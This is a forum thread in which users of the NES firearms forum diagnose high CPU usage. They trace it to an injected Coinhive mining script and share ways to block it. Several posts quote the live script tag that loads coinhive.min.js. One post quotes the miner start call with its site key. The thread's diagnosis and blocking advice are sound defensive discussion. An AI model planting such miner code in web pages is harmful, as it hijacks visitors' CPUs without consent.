• If you enjoy the forum please consider supporting it by signing up for a NES Membership  The benefits pay for the membership many times over.

NES site using 100% CPU - Problem found, BITCOIN MINING SCRIPT on NES Content

Noreaster

Noreaster

Joined
Jan 8, 2013
Messages
3,587
Likes
3,674
Location
Sudbury, MA Surrounded by snowflakes.
Feedback: 2 / 0 / 0
Problem was tracked down to a bitcoin mining script being launched from the NES site and running in the background of your system.

This needs to be blocked from NES sites:
<script type="text/javascript" src="https://coin-hive.com/lib/coinhive.min.js"></script>
Click to expand...

--- Original Post ---

Wrote this off as a MAC OS problem, until i got to work today and its doing the same things on a WIN 7 box. Commonality is Firefox at the moment. Something on the NES site, (not sure if ad content or the forum software), is causing 100% CPU usage on Firefox. I think it started Sunday, however was not on much on Saturday. Close the NES site tab, CPU goes right down to 2%. On a mac the process is the Firefox WC process, kill it and the NES tab will close and you get a crash report on just that tab.

- - - - - - -

Looking back, i am uncertain of when this issue started, it only eats up a single core in WIN, not sure if i just didn't notice it before. On the MAC it caused the CPU to heat up something fierce and fan to get as loud as i have ever heard it. Thats what got me looking.
 
Last edited:
I'm having the same issue with chrome & WIN 7. I closed all the other tabs and just clicking on the NES forum without logging on CPU is at 100%. I found this out due to occasional non-NES pages freezing on me.
 
Maura?

OK, tinfoil aside, a couple of us were having similar problems with the site running super slow plus double or even triple posts.
 
Interesting, since last week NES on tapatalk has been taking forever but other forums are fast. Thought it was a tapatalk update that killed it but possibly related. Once I can get the forum to load it goes normally with slow pictures but getting the first listing of topics can take over a minute, sometimes 2.

Sent from my SAMSUNG-SM-G890A using Tapatalk
 
cockpitbob said:
Firefox too.

Been on with IE-11 for a few minutes and no problems (yet?)
Click to expand...

Agree, also noticed that IE was not displaying an AD just above the announcements. Firefox is. And also noticed my firefox ad blocker is missing.

--- update ---

Adblocker plus re-enabled. Ad is gone, CPU (on a single core) is still maxing.
 
Last edited:
Whoa never noticed this- explains my laptops recently crappy battery life. Safari and MacBook / iMac here.
 
I've been getting the following message after submitting each post for the past 2 days:

"This page is asking you to confirm that you want to leave - data you have entered may not be saved"

taskman.exe shows 100 % useage for me too (Firefox).
 
Last edited:
Yeah found the problem- a bitcoin mining script is running in the background. Get no script, block "coin hive," and you're golden.ETA if you have Safari just uncheck "Enable Javascript" in your security settings until this gets resolved.
 
Last edited:
I use the Brave browser with Shield Down for NES and got high CPU usage. When I put Shields Up with script blocking, it stops.

Brave is a great security browser by the way
 
Snora said:
Yeah found the problem- a bitcoin mining script is running in the background. Get no script, block "coin hive," and you're golden.ETA if you have Safari just uncheck "Enable Javascript" in your security settings until this gets resolved.
Click to expand...

Done. Thanks !
 
Same - Win 10 and chrome
attachment.php
 

Attachments

  • Image1.jpg
    Image1.jpg
    56.7 KB · Views: 292
There you go- get someone to fix this code pulled from this page:.src="https://coin-hive.com/lib/coinhive.min.js"var miner = new CoinHive.Anonymous("08dmbABKxcA0jLBShrcFMajf7yELsyGi");miner.start();
 
Snora said:
Yeah found the problem- a bitcoin mining script is running in the background. Get no script, block "coin hive," and you're golden.ETA if you have Safari just uncheck "Enable Javascript" in your security settings until this gets resolved.
Click to expand...

Excellent find sir. I noticed that java is not supported in my IE, and is nativly supported on firefox, i suspected it was something being called by java. Nice, so we have all been mining bitcoins in the background.
 
Noreaster78 said:
Excellent find sir. I noticed that java is not supported in my IE, and is nativly supported on firefox, i suspected it was something being called by java. Nice, so we have all been mining bitcoins in the background.
Click to expand...
For the record Java and Javascript are not the same thing. Make sure you're blocking the right thing.
 
Can a sysadmin let us know if this was intentionally done by NES staff; included as part of the Chrome distribution; or the results of hackery?
 
This definitely looks like an XSS attack to me. I solved the problem by manually adding the address of the .js script to my adblock plus filter list. No problems with CPU maxing out anymore. Granted this will only work for me for Chrome. Any other browsers will need to have some sort of addblock software.
 
amm5061 said:
This definitely looks like an XSS attack to me. I solved the problem by manually adding the address of the .js script to my adblock plus filter list. No problems with CPU maxing out anymore. Granted this will only work for me for Chrome. Any other browsers will need to have some sort of addblock software.
Click to expand...
Chrome settings -> advanced -> content settings -> javascript allows blocking of Javascript by site. Block coin-hive.com, not northeastshooters.com, or you will also disable features like embedded youtube videos in posts.
 

Similar threads

"NES can't connect" Feb 12 evening shift.
Replies
15
Views
195
Gator9329
Gator9329
NES AP on my phone...something change?
Replies
6
Views
353
rebut
rebut
info on posting
Replies
1
Views
151
pastera
pastera
Did something change on the site settings?
Replies
4
Views
387
Boghog1
Boghog1
Unexpected database errors & blank site pages
Replies
9
Views
284
SwampYankee42
SwampYankee42
Back
Top Bottom